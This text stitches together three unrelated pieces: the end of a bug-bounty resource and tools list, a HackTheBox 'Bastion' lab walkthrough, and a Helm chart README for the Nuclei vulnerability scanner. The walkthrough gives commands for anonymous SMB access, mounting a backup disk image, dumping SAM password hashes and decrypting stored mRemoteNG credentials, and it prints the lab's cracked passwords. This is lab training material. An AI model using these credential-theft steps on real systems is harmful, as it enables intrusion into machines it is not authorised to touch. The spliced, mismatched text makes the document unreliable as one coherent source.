https://www.youtube.com/c/DomainofScience/videos Hindi Spin The Hack: https://www.youtube.com/c/SpinTheHack Pratik Dabhi: https://www.youtube.com/c/impratikdabhi Bitten Tech: https://www.youtube.com/c/BittenTech THE BBH: https://www.youtube.com/c/THEBBH Join Twitter Today! World class security researchers and bug bounty hunters are on Twitter. Where are you? Join Twitter now and get daily updates on new issues, vulnerabilities, zero days, exploits, and join people sharing their methodologies, resources, notes and experiences in the cyber security world! # Twitter expert Infosec People's To Must Follow! 1) Ben Sadeghipour : https://twitter.com/NahamSec 2) STÖK : https://twitter.com/stokfredrik 3) TomNomNom : https://twitter.com/TomNomNom 4) shubs : https://twitter.com/infosec_au 5) Emad Shanab : https://twitter.com/Alra3ees 6) payloadartist : https://twitter.com/payloadartist 7) ʀᴇᴍᴏɴ : https://twitter.com/remonsec 8) Aditya Shende : https://twitter.com/ADITYASHENDE17 9) Hussein Daher : https://twitter.com/HusseiN98D 10) The XSS Rat : https://twitter.com/theXSSrat 11) zseano : https://twitter.com/zseano 12) Corben Leo : https://twitter.com/hacker_ 13) Vickie Li : https://twitter.com/vickieli7 14) GodFather Orwa : https://twitter.com/GodfatherOrwa 15) Ashish Kunwar : https://twitter.com/D0rkerDevil 16) Farah_Hawaa : https://twitter.com/Farah_Hawaa 17) Jason Haddix : https://twitter.com/Jhaddix 18) @brutelogic : https://twitter.com/brutelogic 19) gregxsunday : https://twitter.com/gregxsunday We highly appricate every researcher and bug hunter contrubuting there time and support to the community. PRACTICE! PRACTICE! and PRACTICE! # CTF Hacker 101: https://www.hackerone.com/hackers/hacker101 PicoCTF: https://picoctf.org/ TryHackMe: https://tryhackme.com/ (premium/free) HackTheBox: https://www.hackthebox.com/ (premium) VulnHub: https://www.vulnhub.com/ HackThisSite: https://hackthissite.org/ CTFChallenge: https://ctfchallenge.co.uk/ Attack-Defense: https://attackdefense.com/ Alert to win: https://alf.nu/alert1 Bancocn: https://bancocn.com/ CTF Komodo Security: https://ctf.komodosec.com/ CryptoHack: https://cryptohack.org/ CMD Challenge: https://cmdchallenge.com/http://overthewire.org/ Explotation Education: https://exploit.education/ Google CTF: https://lnkd.in/e46drbz8 HackTheBox : https://www.hackthebox.com/ Hackthis : https://www.hackthis.co.uk/ Hacksplaining : https://lnkd.in/eAB5CSTA Hacker Security : https://lnkd.in/ex7R-C-e Hacking-Lab : https://hacking-lab.com/ HSTRIKE : https://hstrike.com/ ImmersiveLabs : https://immersivelabs.com/ NewbieContest : https://lnkd.in/ewBk6fU5 OverTheWire : http://overthewire.org/ Practical Pentest Labs : https://lnkd.in/esq9Yuv5 Pentestlab : https://pentesterlab.com/ Hackaflag BR : https://hackaflag.com.br/ Penetration Testing Practice Labs : https://lnkd.in/e6wVANYd PicoCTF : https://picoctf.com/ PWNABLE : https://lnkd.in/eMEwBJzn Root-Me : https://www.root-me.org/ Root in Jail : http://rootinjail.com/ SANS Challenger : https://lnkd.in/e5TAMawK SmashTheStack : https://lnkd.in/eVn9rP9p The Cryptopals Crypto Challenges : https://cryptopals.com/ Try Hack Me : https://tryhackme.com/ Vulnhub : https://www.vulnhub.com/ W3Challs : https://w3challs.com/ WeChall : http://www.wechall.net/ Zenk-Security : https://lnkd.in/ewJ5rNx2 Cyberdefenders : https://lnkd.in/dVcmjEw8 LetsDefend : https://letsdefend.io/ Vulnmachines : https://vulnmachines.com/ Rangeforce : https://www.rangeforce.com/ Ctftime : https://ctftime.org/ Pwn college : https://dojo.pwn.college/ PentesterLab: https://pentesterlab.com/referral/olaL4k8btE8wqA (premium) Free Money CTF :- https://bugbase.in/ Online Labs PortSwigger Web Security Academy: https://portswigger.net/web-security OWASP Juice Shop: https://owasp.org/www-project-juice-shop/ XSSGame: https://xss-game.appspot.com/ BugBountyHunter: https://www.bugbountyhunter.com/ (premium) W3Challs : https://w3challs.com/ Offline Labs DVWA: https://dvwa.co.uk/ bWAPP: http://www.itsecgames.com/ Metasploitable2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/ BugBountyHunter: https://www.bugbountyhunter.com/ (premium) W3Challs : https://w3challs.com/ Bug Bounty Platforms Crowdsourcing hackenproof: https://hackenproof.com/ Bugcrowd: https://www.bugcrowd.com/ Hackerone: https://www.hackerone.com/ Intigriti: https://www.intigriti.com/ YesWeHack: https://www.yeswehack.com/ OpenBugBounty: https://www.openbugbounty.org/ Bugbounty japan: https://bugbounty.jp/ safeHat: https://safehats.com/ Individual Programs Meta: https://www.facebook.com/whitehat Google: https://about.google/appsecurity/ <b> All bug hunting platform - chaos.projectdiscovery: https://chaos.projectdiscovery.io/#/ </b> # cybersecurity news Seytonic: https://www.youtube.com/c/Seytonic Grant Collins: https://www.youtube.com/channel/UCTLUi3oc1-a7dS-2-YgEKmA/videos # hardware hacking Joe Grand: https://www.youtube.com/c/JoeGrand Jeff Geerling :https://www.youtube.com/c/JeffGeerling Computerphile: https://www.youtube.com/user/Computerphile/videos Lennert :https://twitter.com/LennertWo # Bug Bounty Report Format Title The first impression is the last impression, the security engineer looks at the title first and he should be able to identify the issue. Write about what kind of functionality you can able to abuse or what kind of protection you can bypass. Write in just one line. Include the Impact of the issue in the title if possible. Description This component provides details of the vulnerability, you can explain the vulnerability here, write about the paths, endpoints, error messages you got while testing. You can also attach HTTP requests, vulnerable source code. Steps to Reproduce Write the stepwise process to recreate the bug. It is important for an app owner to be able to verify what you've found and understand the scenario. You must write each step clearly in-order to demonstrate the issue. that helps security engineers to triage fast. Proof of Concept This component is the visual of the whole work. You can record a demonstration video or attach screenshots. Impact Write about the real-life impact, How an attacker can take advantage if he/she successfully exploits the vulnerability. What type of possible damages could be done? (avoid writing about the theoretical impact) Should align with the business objective of the organization Sample Report # Browser Extensions for Bug Bounty 1) KNOXSS For Cross Site Scripting : KNOXSS is a popular tool developed by Brazilian Security Researcher @Brutelogic . The tool aims to find Cross Site Scripting Vulnerability while we browse the website. If you are new to Cross Site Scripting attack We suggest you to check this post. The tool has two versions available, Community Edition which is free to use Link - https://addons.mozilla.org/en-US/firefox/addon/knoxss-community-edition 2) Wappalyzer : Wappalyzer is a technology profiler that identifies the CMS, JS libraries, Frameworks and other technologies that the websites use. It will help you to focus the recon process on a certain technology or framework by identifying them with the current version of them. The alternative for this add-on can be Builtwith technology Lookup Link - https://addons.mozilla.org/en-US/firefox/addon/wappalyzer 3. Hackbar Addon The security researchers will finds Hackbar tool to be extremely beneficial. When testing a web application or web server, we frequently alter the address bar’s settings. We repeatedly refresh webpages. All of these things frequently occur to us. Hackbar add-on aids us in reducing this time and performing our task quickly. The tool consist payloads for XSS attacks, SQL Injection, WAF Bypass Payloads, LFI Payloads etc. Link: https://addons.mozilla.org/en-US/firefox/addon/maxs-hackbar Link: https://addons.mozilla.org/en-US/firefox/addon/hackbartool 4.FoxyProxy A Firefox addon called FoxyProxy helps to automatically switch an internet connection between one or more proxy servers. FoxyProxy, to put it simply, simplifies the manual process of modifying the Connection Settings in Firefox. It is very useful during pen testing work. It helps in turning off/on proxy in a single click. FoxyProxy also does have feature of bypassing proxy (Intercept in burp suite) for specific domains using blacklist and whitelist feature. Link: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard 5. DotGit An extension for checking if .git is exposed in visited websites. The addon also checks for exposed environment files (.env), security.txt and more while we browse the web. This addon helps us in finding information disclosure vulnerability. Sometimes exposing environment file and git file can have serious security impact. Link: https://addons.mozilla.org/en-US/firefox/addon/dotgit 6. User-Agent Switcher A user-agent switcher modifies your browser’s user agent. When communicating with a web server, your browser sends a string of text or a HTTP header called a “user agent” that contains information about the user’s operating system, current browser, rendering engine, and other important components. Based on the users agent the servers gives response to the user. During penetration testing we can test for application by loading same application in different types of browser such as for a Mobile, for a PC, for a tablet etc. This is very handy for developers as well for testing responsiveness of a developed website. Link: https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher 7. ModHeader ModHeader addon helps in modifying HTTP request and response headers easily in a browser. By the use of this add-on we can search for vulnerabilities like Authorization Bypass, cookie modification, session data manipulation, Referrer Bypass etc. Once we set HTTP header that will be used on each website that we visit. Link: https://addons.mozilla.org/en-US/firefox/addon/modheader-firefox/ 8. Beautifier & Minify You can easily minify and simplify CSS, HTML, and JavaScript code with the help of this add-on. During penetration testing we often land with large chunked JavaScript code which is difficult to read and get to understand the flow of code. In such time this addon help us in beautifully minifying code in readable format so that we can find flaws in source code. Link: https://addons.mozilla.org/en-US/firefox/addon/beautifer-minify/ 9. Retire.js With retire JS we can find for vulnerable JavaScript library. It helps in finding known vulnerabilities sin js and few of the CVE affecting JS products. Link: https://addons.mozilla.org/en-US/firefox/addon/retire-js/ 10. Email Extractor Automated email extraction tool that automatically saves email addresses from web pages that we visits. Main goal of this add-on is to collect possible exposed email address from source code and can aid in performing social engineering attacks, credential stuffing attack etc. Link: https://addons.mozilla.org/en-US/firefox/addon/mailshunt-email-extractor/ 11. TruffleHog Chrome Extension The TruffleHog browser plugin scans visited websites for API keys and credentials and notifies you if any are found. This is helpful for conducting pentests and code reviews since it reveals keys that would otherwise be overlooked or need manual searching. Link: https://chrome.google.com/webstore/detail/trufflehog/bafhdnhjnlcdbjcdcnafhdcphhnfnhjc 12. Fake Filler This extension’s goal is to make it easier and faster for developers and testers to test fill-up forms. It helps in filling all form inputs (textboxes, text areas, radio buttons, drop downs, etc.) with fake and randomly generated data. Link: https://addons.mozilla.org/en-US/firefox/addon/fake-filler/ 13. Click-jacking This addon helps in finding clickjacking vulnerability by looking for absence of X-Frame-Options header in a website. Link: https://addons.mozilla.org/en-US/firefox/addon/click-jacking/ 14. Cookie Editor Cookie-Editor helps you in manipulating the cookie of a website. A user can modify, delete, add cookie values for different purpose of tests. Vulnerabilities like session theft, privilege escalation, session misconfiguration etc. can be tested using this add-on. Link: https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/ # Advance Recon & information gathering 1. Shodan-Search for devices connected to the internet. ( https://www.shodan.io/ ) 2. Wigle-Database of wireless networks, with statistics. ( https://www.wigle.net/ ) 3. Grep App-Search across a half million git repos. ( https://grep.app/ ) 4. Binary Edge-Scans the internet for threat intelligence. ( https://www.binaryedge.io/ ) 5. ONYPHE-Collects cyber-threat intelligence data. ( https://www.onyphe.io/ ) 6. GreyNoise-Search for devices connected to the internet. ( https://www.greynoise.io/ ) 7. Censys-Assessing attack surface for internet connected devices. ( https://search.censys.io/hosts/ ) 8. Hunter-Search for email addresses belonging to a website. ( https://hunter.io/) 9. Fofa-Search for various threat intelligence. 10. ZoomEye-Gather information about targets. ( https://github.com/topics/zoomeye ) 11. Leak X-Search publicly indexed information. ( https://leakix.net/ ) 12. IntelligenceX-Search Tor, 12P, data leaks, domains, and emails. ( https://intelx.io/ ) 13. Netlas-Search and monitor internet connected assets. ( https://netlas.io/ ) 14. URL Scan-Free service to scan and analyse websites. ( https://urlscan.io/ ) 15. PublicWWW-Marketing and affiliate marketing research. ( https://publicwww.com/ ) 16. FullHunt-Search and discovery attack surfaces. ( https://fullhunt.io/search ) 17. CRT sh-Search for certs that have been logged by CT. ( https://crt.sh/ ) 18. Vulners-Search vulnerabilities in a large database. ( https://vulners.com/search ) 19 Pulsedive-Search for threat intelligence. ( https://pulsedive.com/ ) 20. Packet Storm Security-Browse latest vulnerabilities and exploits. 21. GrayHatWarefare-Search public S3 buckets. ( https://buckets.grayhatwarfare.com/ ) 22. viz.greynoise.io - GreyNoise Visualizer 23. onyphe.io - Cyber Defense Search Engine 24. vigilante.pw - Breached Database Directory 25. dnsdumpster.com - DNS recon & research .phonebook.cz - Search for subdomains, email addresses, or URLS # Cybersecurity & Hacking Documentaries Some Great Cybersecurity & Hacking Documentaries Recommendations! 1) We Are Legion – The Story Of The Hacktivists - https://lnkd.in/dEihGfAg 2) 21st Century Hackers - https://lnkd.in/dvdnZkg5 3) Hackers Wanted - https://lnkd.in/du-pMY2R 4) Hackers in wonderland - https://www.youtube.com/watch?v=fe8GsPCpE7E 5) The Internet’s Own Boy: The Story Of Aaron Swartz - https://lnkd.in/d3hQVxqp 6) Def Con: The Documentary - https://lnkd.in/dPE4jVVA 7) Hackers Are People Too - https://www.youtube.com/watch?v=7jciIsuEZWM 8) Secret History Of Hacking - https://lnkd.in/dnCWU-hp 9) Risk (2016) - https://lnkd.in/dMgWT-TN 10) Zero Days (2016) - https://lnkd.in/dq_gZA8z 11) Guardians Of The New World (Hacking Documentary) | Real Stories - https://lnkd.in/dUPybtFd 12) A Origem dos Hackers - https://lnkd.in/dUJgG-6J 13) The Great Hack - https://lnkd.in/dp-MsrQJ 14) The Networks Dilemma - https://lnkd.in/dB6rC2RD 15) Web Warriors - https://lnkd.in/dip22djp 16) Cyber War - Dot of Documentary - https://lnkd.in/dhNTBbbx 17) CyberWar Threat - Inside Worlds Deadliest Cyberattack - https://lnkd.in/drmzKJDu 18) The Future of Cyberwarfare - https://lnkd.in/dE6_rD5x 19) Dark Web Fighting Cybercrime Full Hacking - https://lnkd.in/dByEzTE9 20) Cyber Defense: Military Training for Cyber Warfare - https://lnkd.in/dhA8c52h 21) Hacker Hunter: WannaCry The History Marcus Hutchin - https://lnkd.in/dnPcnvSv 22) The Life Hacker Documentary - https://lnkd.in/djAqBhbw 23) Hacker The Realm and Electron - Hacker Group -https://lnkd.in/dx_uyTuT 24) Chasing Edward Snowden - https://www.youtube.com/watch?v=8YkLS95qDjI 25) The Hacker Wars - https://www.youtube.com/watch?v=ku9edEKvGuY 26) Hackers World - https://www.youtube.com/watch?v=1A3sQO_bQ_E 27) In the Realm of the Hackers - https://www.youtube.com/watch?v=0UghlW1TsMA 28) The Pirate Bay Away From Keyboard - https://www.youtube.com/watch?v=eTOKXCEwo_8 29) Wannacry: The Marcus Hutchins Story - https://www.youtube.com/watch?v=vveLaA-z3-o 30) THE INSIDE LIFE OF A HACKER - https://www.youtube.com/watch?v=CuESlhKLhCY 31) High Tech Hackers Documentary- https://www.youtube.com/watch?v=l2fB_O5Q6ck 32) Drones, hackers and mercenaries - The future of war - https://www.youtube.com/watch?v=MZ60UDys_ZE Some additional Tips Don't do bug bounty as a full time in the beginning (although I suggest don't do it full time at any point). There is no guarantee to get bugs every other day, there is no stability. Always keep multiple sources of income (bug bounty not being the primary). Stay updated, learning should never stop. Join twitter, follow good people, maintain the curiosity to learn something new every day. Read writeups, blogs and keep expanding your knowledge. Always see bug bounty as a medium to enhance your skills. Money will come only after you have the skills. Take money as a motivation only. Don't be dependent on automation. You can't expect a tool to generate money for you. Automation is everywhere. The key to success in Bug Bounty is to be unique. Build your own methodology, learn from others and apply on your own. Always try to escalate the severity of the bug, Keep a broader mindset. An RCE always has higher impact than arbitrary file upload. It's not necessary that a vulnerability will be rewarded based on the industry defined standard impact. The asset owners rate the issue with a risk rating, often calculated as impact * likelyhood (exploitability). For example, an SQL Injection by default has a Critical impact, but if the application is accessible only inside the organization VPN and doesn't contain any user data/PII in the database, the likelyhood of the exploitation is reduced, so does the risk. Stay connected to the community. Learn and contribute. There is always someone better than you in something. don't miss an opportunity to network. Join forums, go to conferences and hacking events, meet people, learn from their experiences. Always be helpful. Ashutosh c. shah
# Bastion <h1 align="center"> <br> <a href="https://www.hackthebox.eu/home/machines/profile/186"><img src="images/img.png" alt="bastion"></a> <br> </h1> <h4 align="center"> Author: L4mpje</h4> *** __Machine IP__: 10.10.10.134 __DATE__ : 17/07/2019 __START TIME__: 11:36 PM *** ## Nmap ![](images/nmap.png) There's SMB service running so we can use tools like `smbmap` or `smbclient` to find some share to look into. *** ## SMB Using the following command I got the list of shares: ```bash ➜ smbclient -L //10.10.10.134/Backups -U "" ``` ![](images/shares.png) We can see that there's one share named `Backups` present. Let's see if we can find anything in it. ![](images/ls.png) The first thing I read was `note.txt`. ![](images/note.png) the `mDGqWiOzka` directory was empty and the `nmap-test-file` had some junk data and `SDT65CB.tmp` was empty. In `WindowsImageBackup` I found another directory named `L4mpje-PC` ![](images/directory.png) After looking around a bit I found some `.vhd` file in `smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\>`. We can download those `.vhd` file and then mount them to find something in them but that might not be the best way to do it because this is what the `note` said: ``` please don't transfer the entire backup files locally, the VPN to the subsidiary office is too slow. ``` So instead we need to find a way to mount the `SMB` directory to our system so we can browse the backup files and then mount the VHD. __Mount SMB__ * Make a new directory to mount SMB share - I did `sudo mkdir /home/bastion` * Run: `sudo mount -t cifs //10.10.10.134/Backups /home/bastion -o user=""` This will mount the SMB share. __Mount VHD__ * Make a new directory, I made a directory within `bastion` - `sudo mkdir /home/bastion/vhd` * Run ```bash guestmount --add /home/bastion/WindowsImageBackup/L4mpje-PC/"Backup 2019-02-22 124351"/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /home/bastion/vhd -v ``` This will mount the VHD, now we can just look around to see if we can find anything. *** ## Pwn User In Windows we can find juicy stuff in `System32`, you can says it's equivalent to `/etc/` of linux(not exactly). Windows store passwords in file called `SAM` and we can use tool like `samdump` to get hashes out of that file. And then using tools like `john` or `hashcat` we can crack it. In `System32/config` we can see the `SAM` file. ![](images/sam.png) Using `samdump2 SYSTEM SAM` we can dump hashes ![](images/hash.png) `26112010952d963c8dc4217daec986d9` I used [`crackstation`](https://crackstation.net/) to crack the hash ![](images/crack.png) `26112010952d963c8dc4217daec986d9: bureaulampje` Now we have the password so we can login into `L4mpje` SSH account. ![](images/ssh.png) We can just grab the `user` hash now. ![](images/user.png) *** ## Privilege Escalation I started looking around but there wasn't anything interesting in the user directory. I decided to look into `Program Files` and `Program Files (x86)` folder. Since this is where the new software are installed, we can see if there's any vulnerable program installed. In `Program Files (x86)` I found a program named `mRemoteNg`, that is the only program which isn't present by default. ![](images/programs.png) So I google exploit for it and found a [metasploit script](https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/mremote.rb) for it. But since it's `post` exploit it will need a shell or something(I'm not good with msf). I continued my search for easy-to-run exploit and found a github repository [kmahyyg/mremoteng-decrypt](https://github.com/kmahyyg/mremoteng-decrypt). According to this I need to get the `User.config` for `mRemoteNG` and then use one of the script to decrypt the password. ![](images/appdata.png) ![](images/dir.png) I used the `type` command to see the content of `confCons.xml` ![](images/content.png) we can see the password hash there. Now we can just use that password with our script to decrypt it. *** I had to edit the python script a bit. First I installed `PyCryptodome` and then Change the following line ```python from Cryptodome.Cipher import AES ``` to ```python from Crypto.Cipher import AES ``` *** I used the following command to crack the password: ```bash ➜ python mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt\/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" ``` and got the output `Password: thXLHM96BeKL0ER2` ![](images/password.png) To confirm that I got the right password I used the `L4mpje` hash and checked if I got `bureaulampje` and I actually did got that: ![](images/check.png) *** First I tried to use the `runas` command to use the `administrator` account but for some reason it didn't worked. So I logged into `SSH` account of `Administrator` using the `administrator: thXLHM96BeKL0ER2`. ![](images/root.png) *** Thanks for reading, Feedback is always appreciated Follow me [@0xmzfr](https://twitter.com/0xmzfr) for more "Writeups".
--- title: "Nuclei" category: "scanner" type: "Website" state: "released" appVersion: "v2.5.2" usecase: "Nuclei is a fast, template based vulnerability scanner." --- <!-- SPDX-FileCopyrightText: 2021 iteratec GmbH SPDX-License-Identifier: Apache-2.0 --> <!-- .: IMPORTANT! :. -------------------------- This file is generated automatically with `helm-docs` based on the following template files: - ./.helm-docs/templates.gotmpl (general template data for all charts) - ./chart-folder/.helm-docs.gotmpl (chart specific template data) Please be aware of that and apply your changes only within those template files instead of this file. Otherwise your changes will be reverted/overwritten automatically due to the build process `./.github/workflows/helm-docs.yaml` -------------------------- --> <p align="center"> <a href="https://opensource.org/licenses/Apache-2.0"><img alt="License Apache-2.0" src="https://img.shields.io/badge/License-Apache%202.0-blue.svg"/></a> <a href="https://github.com/secureCodeBox/secureCodeBox/releases/latest"><img alt="GitHub release (latest SemVer)" src="https://img.shields.io/github/v/release/secureCodeBox/secureCodeBox?sort=semver"/></a> <a href="https://owasp.org/www-project-securecodebox/"><img alt="OWASP Incubator Project" src="https://img.shields.io/badge/OWASP-Incubator%20Project-365EAA"/></a> <a href="https://artifacthub.io/packages/search?repo=securecodebox"><img alt="Artifact HUB" src="https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/securecodebox"/></a> <a href="https://github.com/secureCodeBox/secureCodeBox/"><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/secureCodeBox/secureCodeBox?logo=GitHub"/></a> <a href="https://twitter.com/securecodebox"><img alt="Twitter Follower" src="https://img.shields.io/twitter/follow/securecodebox?style=flat&color=blue&logo=twitter"/></a> </p> ## What is Nuclei Nuclei is used to send requests across targets based on a template leading to zero false positives and providing fast scanning on large number of hosts. Nuclei offers scanning for a variety of protocols including TCP, DNS, HTTP, File, etc. With powerful and flexible templating, all kinds of security checks can be modelled with Nuclei. To learn more about the Nuclei scanner itself visit [Nuclei GitHub] or [Nuclei Website]. ## Deployment The nuclei chart can be deployed via helm: ```bash # Install HelmChart (use -n to configure another namespace) helm upgrade --install nuclei secureCodeBox/nuclei ``` ## Scanner Configuration The following security scan configuration example are based on the [Nuclei Documentation], please take a look at the original documentation for more configuration examples. ```bash nuclei -h Nuclei is a fast, template based vulnerability scanner focusing on extensive configurability, massive extensibility and ease of use. Usage: nuclei [flags] Flags: TARGET: -u, -target string[] target URLs/hosts to scan -l, -list string path to file containing a list of target URLs/hosts to scan (one per line) TEMPLATES: -tl list all available templates -t, -templates string[] template or template directory paths to include in the scan -w, -workflows string[] list of workflows to run -nt, -new-templates run newly added templates only -validate validate the passed templates to nuclei FILTERING: -tags string[] execute a subset of templates that contain the provided tags -include-tags string[] tags from the default deny list that permit executing more intrusive templates -etags, -exclude-tags string[] exclude templates with the provided tags -include-templates string[] templates to be executed even if they are excluded either by default or configuration -exclude-templates, -exclude string[] template or template directory paths to exclude -severity, -impact string[] execute templates that match the provided severities only -author string[] execute templates that are (co-)created by the specified authors OUTPUT: -o, -output string output file to write found issues/vulnerabilities -silent display findings only -v, -verbose show verbose output -vv display extra verbose information -nc, -no-color disable output content coloring (ANSI escape codes) -json write output in JSONL(ines) format -irr, -include-rr include request/response pairs in the JSONL output (for findings only) -nm, -no-meta don't display match metadata -rdb, -report-db string local nuclei reporting database (always use this to persist report data) -me, -markdown-export string directory to export results in markdown format -se, -sarif-export string file to export results in SARIF format CONFIGURATIONS: -config string path to the nuclei configuration file -rc, -report-config string nuclei reporting module configuration file -H, -header string[] custom headers in header:value format -V, -var value custom vars in var=value format -r, -resolvers string file containing resolver list for nuclei -system-resolvers use system DNS resolving as error fallback -passive enable passive HTTP response processing mode -env-vars Enable environment variables support INTERACTSH: -no-interactsh do not use interactsh server for blind interaction polling -interactsh-url string self-hosted Interactsh Server URL (default "https://interact.sh") -interactions-cache-size int number of requests to keep in the interactions cache (default 5000) -interactions-eviction int number of seconds to wait before evicting requests from cache (default 60) -interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5) -interactions-cooldown-period int extra time for interaction polling before exiting (default 5) RATE-LIMIT: -rl, -rate-limit int maximum number of requests to send per second (default 150) -rlm, -rate-limit-minute int maximum number of requests to send per minute -bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25) -c, -concurrency int maximum number of templates to be executed in parallel (default 10) OPTIMIZATIONS: -timeout int time to wait in seconds before timeout (default 5) -retries int number of times to retry a failed request (default 1) -project use a project folder to avoid sending same request multiple times -project-path string set a specific project path (default "/var/folders/xq/zxykn5wd0tx796f0xhxf94th0000gp/T/") -spm, -stop-at-first-path stop processing HTTP requests after the first match (may break template/workflow logic) HEADLESS: -headless enable templates that require headless browser support -page-timeout int seconds to wait for each page in headless mode (default 20) -show-browser show the browser on the screen when running templates with headless mode DEBUG: -debug show all requests and responses -debug-req show all sent requests -debug-resp show all received responses -proxy, -proxy-url string URL of the HTTP proxy server -proxy-socks-url string URL of the SOCKS proxy server -trace-log string file to write sent requests trace log -version show nuclei version -tv, -templates-version shows the version of the installed nuclei-templates UPDATE: -update update nuclei to the latest released version -ut, -update-templates update the community templates to latest released version -nut, -no-update-templates Do not check for nuclei-templates updates -ud, -update-directory string overwrite the default nuclei-templates directory (default "/Users/robert/nuclei-templates") STATISTICS: -stats display statistics about the running scan -stats-json write statistics data to an output file in JSONL(ines) format -si, -stats-interval int number of seconds to wait between showing a statistics update (default 5) -metrics expose nuclei metrics on a port -metrics-port int port to expose nuclei metrics on (default 9092) ``` ## Requirements Kubernetes: `>=v1.11.0-0` ## Values | Key | Type | Default | Description | |-----|------|---------|-------------| | cascadingRules.enabled | bool | `true` | Enables or disables the installation of the default cascading rules for this scanner | | nucleiTemplateCache.concurrencyPolicy | string | `"Replace"` | Determines how kubernetes handles cases where multiple instances of the cronjob would work if they are running at the same time. See: https://kubernetes.io/docs/tasks/job/automated-tasks-with-cron-jobs/#concurrency-policy | | nucleiTemplateCache.enabled | bool | `true` | Enables or disables the use of an persistent volume to cache the always downloaded nuclei-templates for all scans. | | nucleiTemplateCache.failedJobsHistoryLimit | int | `10` | Determines how many failed jobs are kept until kubernetes cleans them up. See: https://kubernetes.io/docs/tasks/job/automated-tasks-with-cron-jobs/#jobs-history-limits | | nucleiTemplateCache.schedule | string | `"0 */1 * * *"` | | | nucleiTemplateCache.successfulJobsHistoryLimit | int | `3` | Determines how many successful jobs are kept until kubernetes cleans them up. See: https://kubernetes.io/docs/tasks/job/automated-tasks-with-cron-jobs/#jobs-history-limits | | parser.env | list | `[]` | Optional environment variables mapped into each parseJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) | | parser.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images | | parser.image.repository | string | `"docker.io/securecodebox/parser-nuclei"` | Parser image repository | | parser.image.tag | string | defaults to the charts version | Parser image tag | | parser.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the parser will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ | | scanner.activeDeadlineSeconds | string | `nil` | There are situations where you want to fail a scan Job after some amount of time. To do so, set activeDeadlineSeconds to define an active deadline (in seconds) when considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#job-termination-and-cleanup) | | scanner.backoffLimit | int | 3 | There are situations where you want to fail a scan Job after some amount of retries due to a logical error in configuration etc. To do so, set backoffLimit to specify the number of retries before considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#pod-backoff-failure-policy) | | scanner.env | list | `[]` | Optional environment variables mapped into each scanJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) | | scanner.extraContainers | list | `[]` | Optional additional Containers started with each scanJob (see: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) | | scanner.extraVolumeMounts | list | `[]` | Optional VolumeMounts mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) | | scanner.extraVolumes | list | `[]` | Optional Volumes mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) | | scanner.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images | | scanner.image.repository | string | `"docker.io/projectdiscovery/nuclei"` | Container Image to run the scan | | scanner.image.tag | string | `nil` | defaults to the charts appVersion | | scanner.nameAppend | string | `nil` | append a string to the default scantype name. | | scanner.resources | object | `{}` | CPU/memory resource requests/limits (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/, https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/) | | scanner.securityContext | object | `{"allowPrivilegeEscalation":false,"capabilities":{"drop":["all"]},"privileged":false,"readOnlyRootFilesystem":false,"runAsNonRoot":false}` | Optional securityContext set on scanner container (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) | | scanner.securityContext.allowPrivilegeEscalation | bool | `false` | Ensure that users privileges cannot be escalated | | scanner.securityContext.capabilities.drop[0] | string | `"all"` | This drops all linux privileges from the container. | | scanner.securityContext.privileged | bool | `false` | Ensures that the scanner container is not run in privileged mode | | scanner.securityContext.readOnlyRootFilesystem | bool | `false` | Prevents write access to the containers file system | | scanner.securityContext.runAsNonRoot | bool | `false` | Enforces that the scanner image is run as a non root user | | scanner.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the scanner will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ | ## License [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) Code of secureCodeBox is licensed under the [Apache License 2.0][scb-license]. [scb-owasp]: https://www.owasp.org/index.php/OWASP_secureCodeBox [scb-docs]: https://docs.securecodebox.io/ [scb-site]: https://www.securecodebox.io/ [scb-github]: https://github.com/secureCodeBox/ [scb-twitter]: https://twitter.com/secureCodeBox [scb-slack]: https://join.slack.com/t/securecodebox/shared_invite/enQtNDU3MTUyOTM0NTMwLTBjOWRjNjVkNGEyMjQ0ZGMyNDdlYTQxYWQ4MzNiNGY3MDMxNThkZjJmMzY2NDRhMTk3ZWM3OWFkYmY1YzUxNTU [scb-license]: https://github.com/secureCodeBox/secureCodeBox/blob/master/LICENSE [Nuclei Website]: https://nuclei.projectdiscovery.io/ [Nuclei GitHub]: https://github.com/projectdiscovery/nuclei [Nuclei Documentation]: https://nuclei.projectdiscovery.io/nuclei/get-started/
